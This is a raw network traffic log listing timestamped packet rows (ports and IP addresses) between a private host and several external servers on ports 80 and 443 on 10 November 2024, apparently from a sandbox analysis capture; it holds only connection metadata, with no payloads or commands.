Nov 10, 2024 04:55:24.643300056 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643305063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643321037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643332005 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643349886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643353939 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643362045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643389940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643392086 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643405914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643415928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643415928 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643435955 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643443108 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643452883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643466949 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643467903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643467903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643491983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643492937 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643510103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643532991 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643542051 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643558025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643568039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643594980 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643603086 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643604994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643625021 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643639088 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643639088 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643639088 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643646002 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643675089 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643675089 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643678904 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643690109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643701077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643714905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643724918 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643773079 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643798113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643807888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643816948 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643845081 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643851042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643862009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643868923 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643872976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643903971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643906116 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643907070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643917084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643943071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643948078 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643975019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643975019 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643975019 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643985987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643996954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644007921 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644021034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644026041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644033909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644047022 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644062042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644062042 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644062042 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644085884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644095898 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644121885 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644123077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644136906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644146919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644154072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644159079 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644174099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644186020 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644216061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644216061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644233942 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644243956 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644243956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644258976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644272089 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644284010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644298077 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644298077 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644299030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644318104 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644328117 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644347906 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644347906 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644355059 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644376993 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644391060 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644396067 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644402981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644416094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644426107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644426107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644429922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644443989 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644443989 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.644470930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.644510984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.665216923 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.665364027 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.665472984 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.666158915 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.666178942 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.666335106 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.666349888 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.666472912 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.666666985 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.666676044 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.667220116 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.667272091 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.667541981 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.667597055 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.668168068 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.668224096 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.668535948 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.668879986 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.668936014 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.669214010 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.669269085 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.669399977 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.669409037 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.669656992 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.669662952 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.674304962 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.674571037 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.674582958 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.675693035 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.675754070 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.676086903 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.676143885 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.676413059 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.676419020 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.677043915 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.677227020 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.677233934 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.677504063 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.677649021 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.677663088 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.678185940 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.678239107 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.678627968 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.678638935 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.678673983 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.678693056 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.679049015 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.679055929 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.679286003 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.679348946 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.679617882 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.679624081 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.688327074 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.688544989 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.688556910 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.689522028 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.689570904 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.689889908 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.689948082 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.689963102 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.699304104 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.699511051 CET	49836	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.699521065 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.699655056 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.699887037 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.699914932 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.700531006 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.700581074 CET	49836	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.700793028 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.700845957 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.700941086 CET	49836	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.700998068 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.701133013 CET	49836	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.701138973 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.701607943 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.701639891 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.701663971 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.701714039 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.701724052 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.701951027 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.701960087 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.703032970 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.703087091 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.703454971 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.703519106 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.703661919 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.703670025 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.711133957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.711324930 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.712222099 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.712471962 CET	49840	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.712486029 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.712793112 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.713217974 CET	49840	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.713274002 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.713418961 CET	49840	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.715930939 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.731333971 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.747952938 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.747976065 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.747982025 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.747984886 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.747984886 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.748312950 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.759332895 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.792850018 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.792867899 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.792907000 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.792934895 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.792963028 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.793052912 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.793095112 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.793139935 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.794281960 CET	49843	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.794298887 CET	443	49843	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.794790983 CET	49841	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.794795036 CET	443	49841	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.803617954 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.803634882 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.803664923 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.803675890 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.803699970 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.803735018 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.805505991 CET	49844	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.805519104 CET	443	49844	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.807447910 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.807473898 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.807482004 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.807528973 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.807543993 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.807573080 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.808429003 CET	49846	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.808434010 CET	443	49846	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.816479921 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.816553116 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.816570997 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.816616058 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.817334890 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.817334890 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.817346096 CET	443	49838	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.817369938 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.817681074 CET	49856	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.817698956 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.817730904 CET	49838	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.817753077 CET	49856	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.818135977 CET	49856	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.818145990 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.830564022 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.830593109 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.830629110 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.830653906 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.830686092 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.831501961 CET	49837	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.831516981 CET	443	49837	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.833029032 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.833050966 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.833103895 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.833106041 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.833961964 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.834207058 CET	49839	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.834213018 CET	443	49839	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.839871883 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.839950085 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.840024948 CET	49836	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.840842009 CET	49836	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.840853930 CET	443	49836	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.854859114 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.854881048 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.854954958 CET	49840	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.854969025 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.855259895 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.855336905 CET	49840	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.862118006 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.863087893 CET	49840	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.863095999 CET	443	49840	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.863594055 CET	49850	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.863612890 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.864094019 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.866763115 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.882319927 CET	49850	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.882411957 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.882612944 CET	49850	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:24.891239882 CET	443	49847	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.899952888 CET	49847	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.899966955 CET	443	49847	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.900496960 CET	49847	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.900501013 CET	443	49847	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.905097008 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.905121088 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.905150890 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.905181885 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.905203104 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.905215979 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.905249119 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.911995888 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.912010908 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.912067890 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.912075043 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.912312031 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.912554026 CET	443	49842	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.912594080 CET	49842	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.918308020 CET	443	49848	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.926696062 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926716089 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926722050 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926753044 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926764965 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926775932 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926794052 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.926801920 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.926846027 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.926872969 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.927253008 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.927268028 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.927325010 CET	443	49850	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:24.927325964 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.927325964 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.927345037 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.927371979 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.934513092 CET	49848	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.934546947 CET	443	49848	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.938070059 CET	49848	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.938076019 CET	443	49848	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.943182945 CET	443	49849	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.943756104 CET	49849	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.943769932 CET	443	49849	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.943913937 CET	49845	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:24.943921089 CET	443	49845	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:24.945679903 CET	49849	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.945683956 CET	443	49849	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.990892887 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.990947962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.990967989 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.990979910 CET	80	49771	185.215.113.206	192.168.2.5
